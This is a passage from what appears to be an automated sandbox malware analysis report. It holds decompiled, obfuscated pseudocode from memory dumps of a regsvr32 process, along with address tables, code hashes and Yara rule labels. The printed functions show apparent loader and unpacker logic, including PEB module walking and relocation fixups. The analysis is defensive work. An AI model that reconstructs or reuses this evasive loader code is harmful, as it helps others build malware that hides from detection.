						_t161 =  *((intOrPtr*)(_t187 + 0x441060))(_t192);
						 *_t259 = _t238;
						 *(_t187 + 0x435621) = 0 ^ _t161;
						_t238 = 0;
						_t192 =  *_t259;
						_t259 =  &(_t259[1]);
					}
					_v16 = _t222;
					_t163 = _t161 & 0x00000000 ^ (_t222 ^ _v16 |  *(_t187 + 0x43596c));
					if( *(_t187 + 0x435054) == 0) {
						_t168 =  *((intOrPtr*)(_t187 + 0x441058))(_t163);
						_v12 = _t238;
						 *(_t187 + 0x435054) = 0 ^ _t168;
						_t192 =  *_t259;
						_t259 =  &(_t259[1]);
						 *_t138 = _t192;
						_t163 = _v12;
					}
					_push(0x401424);
					if( *(_t187 + 0x43520f) == 0) {
						_t166 =  *((intOrPtr*)(_t187 + 0x441054))(_t187 + 0x4357c6, _t192, _t163);
						_v12 = _t205;
						 *(_t187 + 0x43520f) = 0 ^ _t166;
						_t192 =  *_t259;
						_pop( *_t146);
						_t163 = _t166 & 0x00000000 ^ _v16;
					}
					_pop( *_t148);
					 *(_t187 + 0x4351a7) =  *(_t187 + 0x4351a7) & _t192;
					 *(_t187 + 0x4351a7) =  *(_t187 + 0x4351a7) + _t163;
					if( *((intOrPtr*)(_t187 + 0x4357b6)) == 0) {
						 *_t155 =  *((intOrPtr*)(_t187 + 0x44105c))();
						_push(_v12);
						_pop( *_t157);
					}
					goto ( *(_t187 + 0x4351a7));
				}
				asm("pushad");
				_t215 = _t215 + _t187;
				_t188 = _t188 + 1 + _t160;
				_push(_t160);
				_push(_t188);
				_push(0x125);
				if( *(_t187 + 0x4353fe) == 0) {
					_t160 =  *((intOrPtr*)(_t187 + 0x4410a0))( *((intOrPtr*)(_t187 + 0x4350b8)),  *((intOrPtr*)(_t187 + 0x43537e)),  *((intOrPtr*)(_t187 + 0x43598c)), 0x3b, 0x77, 0x10b, 0x2000);
					 *(_t187 + 0x4353fe) =  *(_t187 + 0x4353fe) & 0x00000000;
					 *(_t187 + 0x4353fe) =  *(_t187 + 0x4353fe) ^ _t251 -  *_t258 ^ _t160;
					_t251 = _t251;
				}
				if( *(_t187 + 0x43545e) == 0) {
					if( *((intOrPtr*)(_t187 + 0x435954)) == 0) {
						_t186 =  *((intOrPtr*)(_t187 + 0x441058))();
						_v12 = _t228;
						 *((intOrPtr*)(_t187 + 0x435954)) = _t186;
						_t228 = _v12;
					}
					_push( *((intOrPtr*)(_t187 + 0x4354f5)));
					_push(0x8e);
					_push( *((intOrPtr*)(_t187 + 0x435988)));
					if( *(_t187 + 0x435849) == 0) {
						_t185 =  *((intOrPtr*)(_t187 + 0x44106c))(_t187 + 0x435908);
						 *(_t187 + 0x435849) =  *(_t187 + 0x435849) & 0x00000000;
						 *(_t187 + 0x435849) =  *(_t187 + 0x435849) | _t205 -  *_t258 ^ _t185;
						_t205 = _t205;
					}
					_push(0x4b);
					_push( *((intOrPtr*)(_t187 + 0x435a11)));
					if( *((intOrPtr*)(_t187 + 0x435342)) == 0) {
						_t183 =  *((intOrPtr*)(_t187 + 0x441058))();
						 *_t258 = _t188;
						 *((intOrPtr*)(_t187 + 0x435342)) = _t183;
						_t188 = 0;
					}
					_t160 =  *((intOrPtr*)(_t187 + 0x4410a0))(0,  *((intOrPtr*)(_t187 + 0x4353f2)));
					_v12 = _t188;
					 *(_t187 + 0x43545e) =  *(_t187 + 0x43545e) & 0x00000000;
					 *(_t187 + 0x43545e) =  *(_t187 + 0x43545e) | _t188 ^ _v12 ^ _t160;
					_t188 = _v12;
					if( *(_t187 + 0x4358e8) == 0) {
						_t160 =  *((intOrPtr*)(_t187 + 0x441060))();
						 *_t258 = _t205;
						 *(_t187 + 0x4358e8) = 0 ^ _t160;
						_t205 = 0;
					}
				}
				_push(0x25);
				if( *(_t187 + 0x4354d6) == 0) {
					if( *(_t187 + 0x435116) == 0) {
						_t182 =  *((intOrPtr*)(_t187 + 0x44105c))();
						_v16 = _t215;
						 *(_t187 + 0x435116) = 0 ^ _t182;
						_t215 = _v16;
					}
					_t160 =  *((intOrPtr*)(_t187 + 0x441054))(_t187 + 0x4352db);
					if( *(_t187 + 0x435372) == 0) {
						_t180 =  *((intOrPtr*)(_t187 + 0x4410a4))( *((intOrPtr*)(_t187 + 0x4350e4)), _t160);
						_v16 = _t228;
						 *(_t187 + 0x435372) =  *(_t187 + 0x435372) & 0x00000000;
						 *(_t187 + 0x435372) =  *(_t187 + 0x435372) | _t228 & 0x00000000 | _t180;
						_t228 = _v16;
						_t160 = (_t180 & 0x00000000) +  *_t258;
						_t258 = _t258 - 0xfffffffc;
					}
					_v16 = _t228;
					 *(_t187 + 0x4354d6) =  *(_t187 + 0x4354d6) & 0x00000000;
					 *(_t187 + 0x4354d6) =  *(_t187 + 0x4354d6) ^ (_t228 ^ _v16 | _t160);
					_t228 = _v16;
				}
				E00191827(_t160, _t187, _t188, _t205, _t215, _t228);
				_push(0x40);
				if( *(_t187 + 0x43500c) == 0) {
					_t178 =  *((intOrPtr*)(_t187 + 0x441054))(_t187 + 0x435786);
					_push(_t251);
					 *(_t187 + 0x43500c) =  *(_t187 + 0x43500c) & 0x00000000;
					 *(_t187 + 0x43500c) =  *(_t187 + 0x43500c) | _t251 & 0x00000000 ^ _t178;
				}
				_push(0x1000);
				if( *(_t187 + 0x43521b) == 0) {
					_t173 =  *((intOrPtr*)(_t187 + 0x441058))();
					if( *((intOrPtr*)(_t187 + 0x4355e1)) == 0) {
						 *_t77 =  *((intOrPtr*)(_t187 + 0x441068))(_t187 + 0x43565d, _t173);
						_push(_v16);
						_pop( *_t79);
						_t173 = 0 ^  *_t258;
						_t258 = _t258 - 0xfffffffc;
					}
					_v16 = _t205;
					 *(_t187 + 0x43521b) =  *(_t187 + 0x43521b) & 0x00000000;
					 *(_t187 + 0x43521b) =  *(_t187 + 0x43521b) ^ (_t205 & 0x00000000 | _t173);
					_t205 = _v16;
				}
				_t160 =  *((intOrPtr*)(_t187 + 0x441038))(0,  *(_t187 + 0x435462));
				goto L25;
			}

0x00191000
0x00191003
0x00191005
0x00191008
0x0019100f
0x0019125b
0x0019125b
0x00191266
0x00191268
0x00191272
0x00191274
0x0019127c
0x00191283
0x00191289
0x00191289
0x0019128a
0x00191292
0x00191299
0x001912a5
0x001912a7
0x001912b4
0x001912df
0x001912e2
0x001912e5
0x001912e5
0x001912eb
0x001912eb
0x001912f1
0x001912fc
0x001912fe
0x00191308
0x0019130a
0x00191310
0x00191318
0x0019131f
0x00191325
0x00191325
0x00191335
0x00191337
0x00191338
0x00191339
0x00191339
0x00191339
0x0019133c
0x00191343
0x0019134b
0x0019134e
0x00191356
0x0019135d
0x00191363
0x00191366
0x00191369
0x00191369
0x0019136c
0x0019137b
0x00191387
0x0019138b
0x00191391
0x00191398
0x001913a3
0x001913a6
0x001913a9
0x001913ac
0x001913ac
0x001913af
0x001913bb
0x001913c6
0x001913cc
0x001913d3
0x001913de
0x001913ea
0x001913ed
0x001913ed
0x001913f0
0x001913f6
0x001913fc
0x00191409
0x00191412
0x00191415
0x00191418
0x00191418
0x0019141e
0x0019141e
0x00191015
0x00191016
0x00191019
0x0019101b
0x0019101c
0x0019101d
0x00191029
0x0019104b
0x00191057
0x0019105e
0x00191064
0x00191064
0x0019106c
0x00191079
0x0019107b
0x00191081
0x00191088
0x0019108e
0x0019108e
0x00191091
0x00191097
0x0019109c
0x001910a9
0x001910b2
0x001910be
0x001910c5
0x001910cb
0x001910cb
0x001910cc
0x001910ce
0x001910db
0x001910dd
0x001910e5
0x001910ec
0x001910f2
0x001910f2
0x001910fb
0x00191101
0x00191109
0x00191110
0x00191116
0x00191120
0x00191122
0x0019112a
0x00191131
0x00191137
0x00191137
0x00191120
0x00191138
0x00191144
0x0019114d
0x0019114f
0x00191155
0x0019115c
0x00191162
0x00191162
0x0019116c
0x00191179
0x00191182
0x00191188
0x00191190
0x00191197
0x0019119d
0x001911a6
0x001911a9
0x001911a9
0x001911ac
0x001911b4
0x001911bb
0x001911c1
0x001911c1
0x001911c4
0x001911c9
0x001911d2
0x001911db
0x001911e1
0x001911e7
0x001911ee
0x001911f4
0x001911f5
0x00191201
0x00191203
0x00191210
0x00191221
0x00191224
0x00191227
0x0019122f
0x00191232
0x00191232
0x00191235
0x0019123d
0x00191244
0x0019124a
0x0019124a
0x00191255
0x00000000

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6dffc6ab0dc623df7d104188c7a479368cdd60f933b7d7c9772a49a395397e
Instruction ID: 6cb297c42e37991e85d7d881fbb4454e69638b74e4db16b59bd34df6e14af8fc
Opcode Fuzzy Hash: 9c6dffc6ab0dc623df7d104188c7a479368cdd60f933b7d7c9772a49a395397e
Instruction Fuzzy Hash: 07D12872804A04EFFF14DFA0C9897597BB1FF24321F1854A9ED0DAE19AC77416A4CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00194162, Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00194162(void* __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4) {
				signed int _v8;
				signed int _t126;
				signed int _t132;
				signed int _t134;
				signed int _t136;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				void* _t160;
				signed int _t164;
				signed int _t167;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				void* _t196;
				signed int _t199;
				signed int _t202;
				void* _t207;
				void* _t210;
				signed int _t211;
				signed int* _t217;
				signed int* _t219;
				signed int* _t220;

				_t207 = __esi;
				_t199 = __edi;
				_t193 = __edx;
				_t160 = __ebx;
				_push(__ebx + 0x4353ea);
				_t126 =  *((intOrPtr*)(__ebx + 0x441044))();
				_push(__ecx);
				 *(__ebx + 0x4351e7) =  *(__ebx + 0x4351e7) & 0x00000000;
				 *(__ebx + 0x4351e7) =  *(__ebx + 0x4351e7) ^ __ecx ^  *_t217 ^ _t126;
				_pop(_t164);
				_push(__ebx + 0x4356fd);
				if( *(__ebx + 0x4355d1) == 0) {
					_push( *((intOrPtr*)(__ebx + 0x4351db)));
					_push( *((intOrPtr*)(__ebx + 0x4355d9)));
					_t159 =  *((intOrPtr*)(__ebx + 0x4410a8))();
					_v8 = __edx;
					 *(__ebx + 0x4355d1) =  *(__ebx + 0x4355d1) & 0x00000000;
					 *(__ebx + 0x4355d1) =  *(__ebx + 0x4355d1) | __edx - _v8 | _t159;
					_t193 = _v8;
				}
				_t132 =  *((intOrPtr*)(_t160 + 0x441044))(_t160 + 0x43511e, _t160 + 0x43566c,  *((intOrPtr*)(_t160 + 0x441044))(_t160 + 0x435918));
				 *_t217 = _t199;
				 *(_t160 + 0x43554d) = _t132;
				_t202 = 0;
				_pop( *_t26);
				_t134 = _t132 & 0x00000000 ^ _v8;
				_v8 = _t164;
				 *(_t160 + 0x4352ef) = _t134;
				_t167 = _v8;
				_push(_t207);
				_v8 = _t167;
				_t136 = _t134 & 0x00000000 | _t167 & 0x00000000 ^ _a4;
				_t170 = _v8;
				if( *(_t160 + 0x43541e) == 0) {
					_t157 =  *((intOrPtr*)(_t160 + 0x44106c))(_t160 + 0x4355e5, _t136);
					 *_t217 = _t211;
					 *(_t160 + 0x43541e) = 0 ^ _t157;
					_t211 = 0;
					_pop( *_t38);
					_t136 = _v8;
				}
				_t171 = _t170 ^ _t170;
				_t196 = _t193;
				if( *((intOrPtr*)(_t160 + 0x4351a3)) == 0) {
					if( *(_t160 + 0x4357ea) == 0) {
						_t154 =  *((intOrPtr*)(_t160 + 0x4410a0))( *((intOrPtr*)(_t160 + 0x43591c)),  *((intOrPtr*)(_t160 + 0x4355a5)),  *((intOrPtr*)(_t160 + 0x4356d5)),  *((intOrPtr*)(_t160 + 0x435050)),  *((intOrPtr*)(_t160 + 0x43513e)),  *((intOrPtr*)(_t160 + 0x435589)), _t171, _t136);
						_v8 = _t171;
						 *(_t160 + 0x4357ea) =  *(_t160 + 0x4357ea) & 0x00000000;
						 *(_t160 + 0x4357ea) =  *(_t160 + 0x4357ea) | _t171 - _v8 | _t154;
						 *_t56 = 0;
						_t171 = _v8;
						_t136 = 0 ^  *_t217;
						_t217 = _t217 - 0xfffffffc;
					}
					 *_t59 =  *((intOrPtr*)(_t160 + 0x441060))(_t171, _t136);
					_push(_v8);
					_pop( *_t61);
					if( *(_t160 + 0x435752) == 0) {
						_t153 =  *((intOrPtr*)(_t160 + 0x4410a0))( *((intOrPtr*)(_t160 + 0x435396)),  *((intOrPtr*)(_t160 + 0x43512a)),  *((intOrPtr*)(_t160 + 0x435034)),  *((intOrPtr*)(_t160 + 0x435825)),  *((intOrPtr*)(_t160 + 0x435094)), 0x4c,  *((intOrPtr*)(_t160 + 0x4352eb)));
						_v8 = _t202;
						 *(_t160 + 0x435752) =  *(_t160 + 0x435752) & 0x00000000;
						 *(_t160 + 0x435752) =  *(_t160 + 0x435752) | _t202 & 0x00000000 ^ _t153;
						_t202 = _v8;
					}
					_pop( *_t76);
					_t171 = _v8;
					_t136 = 0 ^  *_t217;
					_t217 = _t217 - 0xfffffffc;
				}
				if(_t136 > 0) {
					if( *(_t160 + 0x43535a) == 0) {
						_t149 =  *((intOrPtr*)(_t160 + 0x441058))(_t171, _t136);
						_v8 = _t171;
						 *(_t160 + 0x43535a) = 0 ^ _t149;
						_t171 =  *_t217;
						_t220 = _t217 - 0xfffffffc;
						_t136 = _t149 & 0x00000000 ^  *_t220;
						_t217 = _t220 - 0xfffffffc;
					}
					if( *(_t160 + 0x43597c) == 0) {
						if( *(_t160 + 0x43534e) == 0) {
							_t147 =  *((intOrPtr*)(_t160 + 0x4410a4))( *((intOrPtr*)(_t160 + 0x4359e5)), _t171, _t136);
							 *(_t160 + 0x43534e) =  *(_t160 + 0x43534e) & 0x00000000;
							 *(_t160 + 0x43534e) =  *(_t160 + 0x43534e) | _t211 & 0x00000000 | _t147;
							 *_t91 = _t211;
							_t171 = 0 ^ _v8;
							_t136 = 0 ^  *_t217;
							_t217 = _t217 - 0xfffffffc;
						}
						_push(_t136);
						_push(_t171);
						if( *(_t160 + 0x435260) == 0) {
							_t146 =  *((intOrPtr*)(_t160 + 0x441064))(_t160 + 0x435102);
							_v8 = _t171;
							 *(_t160 + 0x435260) =  *(_t160 + 0x435260) & 0x00000000;
							 *(_t160 + 0x435260) =  *(_t160 + 0x435260) ^ (_t171 ^ _v8 | _t146);
						}
						_t143 =  *((intOrPtr*)(_t160 + 0x441060))();
						_v8 = _t202;
						 *(_t160 + 0x43597c) =  *(_t160 + 0x43597c) & 0x00000000;
						 *(_t160 + 0x43597c) =  *(_t160 + 0x43597c) | _t202 & 0x00000000 ^ _t143;
						_t202 = _v8;
						_pop( *_t110);
						_t171 = _v8;
						_pop( *_t112);
						_t136 = (_t143 & 0x00000000) + _v8;
					}
					_t173 = _t171 + _t136 + _t136;
					if( *(_t160 + 0x435a1d) == 0) {
						_t141 =  *((intOrPtr*)(_t160 + 0x441054))(_t160 + 0x4356b1, _t173, _t136);
						_v8 = _t173;
						 *(_t160 + 0x435a1d) = _t141;
						_t173 =  *_t217;
						_t219 =  &(_t217[1]);
						_t136 = (_t141 & 0x00000000) +  *_t219;
						_t217 =  &(_t219[1]);
					}
					 *_t217 =  *_t217 ^ _t173;
					_t174 = _t160;
					_t210 = _t207 + _t174;
					if(_t174 > _t136) {
						_v8 = _t174;
						_t136 = E00194162(_t160, _v8, _t196, _t202, _t210, (_t136 & 0x00000000 ^ _t174 - _v8 ^ _a4) - 1);
					}
				}
				_push(_t136);
				 *_t217 =  *_t217 ^ _t136;
				return _t136;
			}

0x00194162
0x00194162
0x00194162
0x00194162
0x00194175
0x00194176
0x0019417c
0x00194182
0x00194189
0x0019418f
0x00194196
0x0019419e
0x001941a0
0x001941a6
0x001941ac
0x001941b2
0x001941ba
0x001941c1
0x001941c7
0x001941c7
0x001941e6
0x001941ee
0x001941f5
0x001941fb
0x00194202
0x00194205
0x00194208
0x0019420f
0x00194215
0x00194218
0x00194219
0x00194225
0x00194227
0x00194231
0x0019423b
0x00194243
0x0019424a
0x00194250
0x00194253
0x00194256
0x00194256
0x0019425e
0x00194260
0x00194268
0x00194275
0x0019429f
0x001942a5
0x001942ad
0x001942b4
0x001942bd
0x001942c0
0x001942c5
0x001942c8
0x001942c8
0x001942d4
0x001942d7
0x001942da
0x001942e7
0x0019430f
0x00194315
0x0019431d
0x00194324
0x0019432a
0x0019432a
0x0019432d
0x00194330
0x00194335
0x00194338
0x00194338
0x0019433e
0x0019434b
0x0019434f
0x00194355
0x0019435c
0x00194367
0x0019436a
0x00194373
0x00194376
0x00194376
0x00194380
0x0019438d
0x00194397
0x001943a3
0x001943aa
0x001943b3
0x001943b6
0x001943bb
0x001943be
0x001943be
0x001943c1
0x001943c2
0x001943ca
0x001943d3
0x001943d9
0x001943e1
0x001943e8
0x001943ee
0x001943f1
0x001943f7
0x001943ff
0x00194406
0x0019440c
0x0019440f
0x00194412
0x0019441b
0x0019441e
0x0019441e
0x00194423
0x0019442c
0x00194437
0x0019443d
0x00194444
0x0019444f
0x00194452
0x0019445b
0x0019445e
0x0019445e
0x00194462
0x00194465
0x00194466
0x0019446a
0x0019446c
0x0019447f
0x0019447f
0x0019446a
0x00194484
0x00194485
0x00194492

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43417e3a48edd8e43b5932f33cd2d7317c77091d1e192d168f64d6eb8d1270f9
Instruction ID: 91494660d7dd020b79389249f1f8f71fe9b739b5ac06b1dfbd5fd83ac262ad49
Opcode Fuzzy Hash: 43417e3a48edd8e43b5932f33cd2d7317c77091d1e192d168f64d6eb8d1270f9
Instruction Fuzzy Hash: 3BA13D72904504EFEF08DFA0C986B5A7BB5FF28311F1851A9DD0EDE189DB345A60DB28

Uniqueness

Uniqueness Score: -1.00%

Function 10014FC0, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10011758, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760

Uniqueness

Uniqueness Score: -1.00%

Function 001934DA, Relevance: .2, Instructions: 154
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E001934DA(signed int __eax, signed int __ebx, signed int __ecx, void* __edx, signed int __edi, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v68;
				signed int _t41;
				signed int _t43;
				signed int _t45;
				void* _t46;
				signed int _t48;
				signed int _t50;
				signed int _t55;
				signed int _t58;
				signed int _t61;
				void* _t64;
				void* _t67;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				signed int _t96;
				signed int _t104;
				signed int _t107;
				signed int _t112;
				void* _t122;
				void* _t125;
				signed int _t128;
				signed int* _t131;

				_push(__esi);
				_push(__edi);
				 *_t2 =  *((intOrPtr*)(__ebx + 0x4350b0));
				_v20 = __eax;
				_t41 = _v20;
				_t87 = __edi & 0x00000000 | __eax ^ _v20 ^ _a4 | __edi & 0x00000000 | __eax ^ _v20 ^ _a4;
				_t104 = _t87;
				_pop(_t88);
				if(_t87 != 0) {
					_push(__ebx);
					_t43 = _t41 & 0x00000000 | __ebx ^  *_t131 ^  *(_t104 +  *((intOrPtr*)(_t104 + 0x3c)) + 0x34);
					_pop(_t55);
					_push(_v12);
					 *_t131 =  *_t131 - _t43;
					_pop( *_t10);
					_v20 = _t55;
					_v8 = _t43;
					_t58 = _v20;
					_t107 =  &_v68;
					_t128 = _t125;
					_v20 = _t88;
					_t45 =  *_t107;
					_t91 = _v20;
					 *_t131 =  *_t131 | _t45;
					_t46 = _t45;
					if( *_t131 != 0) {
						_v20 = _t58;
						_t74 = __ecx & 0x00000000 | _t58 ^ _v20 |  *(_t107 + 4);
						_t61 = _v20;
						_t48 = _t46 + _v12 + _v8;
						_push(_t107);
						_t122 = (__esi & 0x00000000 ^ _t107 & 0x00000000 ^ _v8) + _v12;
						while(1) {
							 *_t131 =  *_t131 | _t74;
							_t75 = _t74;
							if( *_t131 == 0) {
								goto L12;
							}
							_v16 = _t91;
							_t112 = (0 ^  *_t48) + _t122;
							_push(_t75);
							_t77 = _t75 & 0x00000000 ^ _t128 ^  *_t131 ^  *(_t48 + 4);
							_t128 = _t128;
							_push(_t77);
							_t64 = _t61;
							_t79 = _t77 + 0xfffffff8 >> 1;
							_t48 = _t48 + 8;
							_t67 = _t64;
							while(1) {
								_t69 = _t79 | _t79;
								_t80 = _t69;
								_t67 = _t67;
								if(_t69 == 0) {
									break;
								}
								 *_t131 = 0xf000;
								_t81 = _t112;
								_t96 =  *_t48 & 0x0000ffff & _t81;
								 *_t28 = _t80;
								_t83 = _t81 & 0x00000000 ^ _v20;
								_push(_t96);
								 *_t131 =  *_t131 | _t96;
								if( *_t131 != 0) {
									_push(_t48);
									_v20 = _t112;
									_t50 = _t48 & 0x00000000 | _t112 ^ _v20 | _v12;
									_t112 = _v20;
									 *((intOrPtr*)(( *_t48 & 0xfff) + _t112)) =  *((intOrPtr*)(( *_t48 & 0xfff) + _t112)) + _t50;
									_t48 =  *_t131;
									_t131 = _t131 - 0xfffffffc;
								}
								_t48 = _t48 + 2;
								_t112 = _t112;
								_t79 = _t83 - 1;
							}
							_t91 =  *_t131;
							_t131 =  &(_t131[1]);
							_pop( *_t36);
							_t74 = _v16 - _t91;
							_t61 = _t67;
						}
					} else {
					}
				} else {
				}
				L12:
				return _t48;
			}

0x001934e0
0x001934e1
0x001934e8
0x001934eb
0x001934f9
0x001934ff
0x00193501
0x00193503
0x00193504
0x0019350e
0x00193518
0x0019351a
0x0019351b
0x0019351e
0x00193521
0x00193524
0x0019352b
0x0019352e
0x00193540
0x00193542
0x00193543
0x0019354a
0x0019354c
0x00193550
0x00193553
0x00193554
0x0019355b
0x00193567
0x00193569
0x0019356f
0x00193572
0x0019357f
0x00193639
0x0019363a
0x0019363d
0x0019363e
0x00000000
0x00000000
0x00193587
0x00193593
0x00193595
0x001935a0
0x001935a2
0x001935a3
0x001935af
0x001935b0
0x001935bb
0x001935bd
0x00193619
0x0019361c
0x0019361e
0x00193620
0x00193621
0x00000000
0x00000000
0x001935c5
0x001935cc
0x001935cd
0x001935d5
0x001935d8
0x001935db
0x001935dc
0x001935e0
0x001935eb
0x001935ec
0x001935f8
0x001935fa
0x001935fd
0x00193606
0x00193609
0x00193609
0x00193615
0x00193617
0x00193618
0x00193618
0x00193625
0x00193628
0x0019362b
0x00193636
0x00193638
0x00193638
0x00000000
0x00193556
0x00000000
0x00193506
0x00193644
0x00193655

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7da7afeaca1ae1e62935734146bf3c6b14c390c8f3e2480dd3232c664faf8aa
Instruction ID: ba63872afdc65dfad842bd60f50e38b7593ad750159b7fe38e0e55500cfc5f5e
Opcode Fuzzy Hash: c7da7afeaca1ae1e62935734146bf3c6b14c390c8f3e2480dd3232c664faf8aa
Instruction Fuzzy Hash: D251A072A04215AFEB04CFAADC8576FF7B6FF88314F198639D564A7280DB746A108B50

Uniqueness

Uniqueness Score: -1.00%

Function 00194495, Relevance: .1, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E00194495(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _v8;
				signed int _t62;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t72;
				signed int _t74;
				signed int _t80;
				signed int _t84;
				signed int _t91;
				signed int _t102;
				signed int _t104;
				signed int _t114;
				signed int _t116;
				void* _t121;
				void* _t143;
				signed int* _t147;

				_push(__ecx);
				_push(__edx);
				_push(__edi);
				_push(__esi);
				if( *((intOrPtr*)(__ebx + 0x435571)) != 1) {
					_v8 = __esi;
					_t114 = __edi & 0x00000000 ^ (__esi & 0x00000000 |  *(__ebx + 0x43574e));
					_push(__edx);
					_t62 = __eax & 0x00000000 | __edx & 0x00000000 |  *(_t114 + 0x3c);
					_pop(_t102);
					_t116 =  *((intOrPtr*)(_t62 + _t114 + 0x28)) +  *(__ebx + 0x4350b0);
					_v8 = __ecx;
					_t104 = _t102 & 0x00000000 ^ (__ecx ^ _v8 | _t116);
					_t84 = _v8;
					_v8 = _t84;
					_t118 = _t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0);
					_push(_t143);
					_v8 = __ebx;
					_t80 = _v8;
					_v8 =  *((intOrPtr*)((_t62 & 0x00000000 ^ (_t143 -  *_t147 |  *((_t116 & 0x00000000 | _t84 ^ _v8 |  *(__ebx + 0x4350b0)) + 0x3c))) + _t118 + 0x28)) +  *(__ebx + 0x4350b0);
					_t67 = 0 ^  *( *((intOrPtr*)((_v8 & 0x00000000 | __ebx & 0x00000000 |  *[fs:0x30]) + 0xc)) + 0xc);
					__eflags = _t67;
					_t91 = _t67;
					_t68 = _v8;
					while(1) {
						 *_t35 =  *((intOrPtr*)(_t91 + 0x1c));
						_push(_v8);
						_pop(_t121);
						__eflags = _t68 - _t121;
						if(_t68 == _t121) {
							break;
						}
						__eflags = _t104 - _t121;
						if(__eflags != 0) {
							_t91 =  *(_t91 + 4);
							if(__eflags != 0) {
								continue;
							} else {
								 *((intOrPtr*)(_t80 + 0x435571)) = 1;
								_pop( *_t52);
								_pop( *_t54);
								_pop( *_t56);
								_t70 =  *_t147;
								__eflags = _t70;
								return _t70;
							}
						} else {
							_pop( *_t44);
							_pop( *_t46);
							_t72 = (_t68 & 0x00000000) + _v8;
							__eflags = _t72;
							return _t72;
						}
						goto L9;
					}
					 *_t37 = _t104;
					_push(_v8);
					_pop( *_t39);
					_pop( *_t40);
					_t74 = _t68 & 0x00000000 | _v8;
					__eflags = _t74;
					return _t74;
				} else {
					_pop( *_t2);
					_pop( *_t4);
					return (__eax & 0x00000000) + _t147[1];
				}
				L9:
			}

0x0019449c
0x0019449d
0x0019449e
0x0019449f
0x001944a7
0x001944e1
0x001944f0
0x001944f5
0x001944ff
0x00194501
0x00194506
0x0019450c
0x00194517
0x00194519
0x0019451c
0x0019452b
0x00194530
0x00194553
0x00194565
0x0019456b
0x00194570
0x00194570
0x00194573
0x00194575
0x00194578
0x0019457b
0x0019457e
0x00194581
0x00194582
0x00194584
0x00000000
0x00000000
0x001945cc
0x001945ce
0x00194602
0x00194605
0x00000000
0x0019460b
0x0019460b
0x00194617
0x0019461d
0x00194623
0x00194631
0x00194631
0x00194638
0x00194638
0x001945d0
0x001945d0
0x001945e4
0x001945fb
0x001945fb
0x001945ff
0x001945ff
0x00000000
0x001945ce
0x00194587
0x0019458a
0x0019458d
0x001945b6
0x001945c5
0x001945c5
0x001945c9
0x001944a9
0x001944af
0x001944c3
0x001944de
0x001944de
0x00000000

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
Instruction ID: dc84b30d265ec74e3c86c2f19c5f8dd606e90ea4817ec52e08e285f37299e582
Opcode Fuzzy Hash: 0479555227218ebb414e8c4145d25bc2b41eb189c0fbb9efb8d710e990c1ccf4
